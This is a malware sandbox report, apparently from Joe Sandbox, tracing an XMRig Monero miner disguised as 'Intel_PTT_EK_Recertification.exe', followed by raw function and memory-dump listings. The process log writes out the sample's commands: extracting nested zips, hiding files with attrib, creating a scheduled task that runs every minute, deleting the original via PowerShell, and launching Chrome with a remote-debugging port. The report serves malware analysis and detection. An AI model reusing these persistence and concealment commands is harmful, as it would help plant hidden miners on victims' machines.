Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_6.zip -oextracted
Imagebase:	0xc40000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:38:59
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_5.zip -oextracted
Imagebase:	0xc40000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:38:59
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_4.zip -oextracted
Imagebase:	0xc40000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:38:59
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_3.zip -oextracted
Imagebase:	0xc40000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:38:59
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_2.zip -oextracted
Imagebase:	0xc40000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:39:00
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_1.zip -oextracted
Imagebase:	0xc40000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:39:00
Start date:	18/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H "in.exe"
Imagebase:	0x7ff6423d0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:39:00
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\in.exe
Wow64 process (32bit):	false
Commandline:	"in.exe"
Imagebase:	0x7ff7ae460000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:39:00
Start date:	18/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff6423d0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:39:01
Start date:	18/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff6423d0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:39:01
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:39:01
Start date:	18/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Imagebase:	0x7ff7dd8e0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:39:01
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:39:01
Start date:	18/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ping 127.0.0.1; del in.exe
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	07:39:01
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:39:01
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	07:39:03
Start date:	18/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\PING.EXE" 127.0.0.1
Imagebase:	0x7ff613020000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	07:39:03
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff680cd0000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	07:39:20
Start date:	18/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	07:39:21
Start date:	18/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	07:39:21
Start date:	18/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2460,i,16473332069904579235,14265532122417200322,262144 /prefetch:8
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	07:39:45
Start date:	18/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000002.2999450325.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000002.3000778509.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000002.2999450325.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000002.2999450325.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000002.3000666854.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	07:39:55
Start date:	18/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	07:40:01
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	07:40:01
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff680cd0000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	07:40:28
Start date:	18/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3593333371.0000000001148000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3593333371.0000000001129000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3594232724.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3594079796.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	774
Total number of Limit Nodes:	16

Executed Functions

Function 00A0652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00A0652A,?,?,?,?,?,00A07661), ref: 00A06566

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 222380abf9b32e629192602853a61e6fb3a0207fd0451de8bf49d9e752803945
Instruction ID: 3d161cd2e15901365bd16f24378abd1892144250ff2538b0f121b1f18521b50c
Opcode Fuzzy Hash: 222380abf9b32e629192602853a61e6fb3a0207fd0451de8bf49d9e752803945
Instruction Fuzzy Hash: F4E08C3054110CABCF267B58ED19F993B29EF91749F000820F8084A261CB66FE92C690

Function 04A20C54 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504871807.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1bb60dc89c8854a6524a385267b039932ebccf9be8a87813fce7cf322afb3ff
Instruction ID: 28fe85a5df4ab7eacecb3cf23ef77edf215fbc309ae8d131972a9f524c5401fa
Opcode Fuzzy Hash: e1bb60dc89c8854a6524a385267b039932ebccf9be8a87813fce7cf322afb3ff
Instruction Fuzzy Hash: ABF0B4FB20E224FE724289856B14AFA7B7CE5D73307308477FA47C6102F29159587172

Function 009D5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000422, xrefs: 009D60C9
00000419, xrefs: 009D6098
0000043f, xrefs: 009D612B
00000423, xrefs: 009D60FA
Keyboard Layout\Preload, xrefs: 009D6054

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: d27a437772473eb8cf8cc194858cb123827d3c45378c85dd6070d619fe136604
Instruction ID: ff5a09d889c914bd501808e2ccfab1a83d7dab6e3310366ccf7ffcb5e0f10252
Opcode Fuzzy Hash: d27a437772473eb8cf8cc194858cb123827d3c45378c85dd6070d619fe136604
Instruction Fuzzy Hash: CFF1C270900258ABEB24DF58CD85BDEBBB9EB44304F5085A9F518A7381DB749E84CF94

Function 009D9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
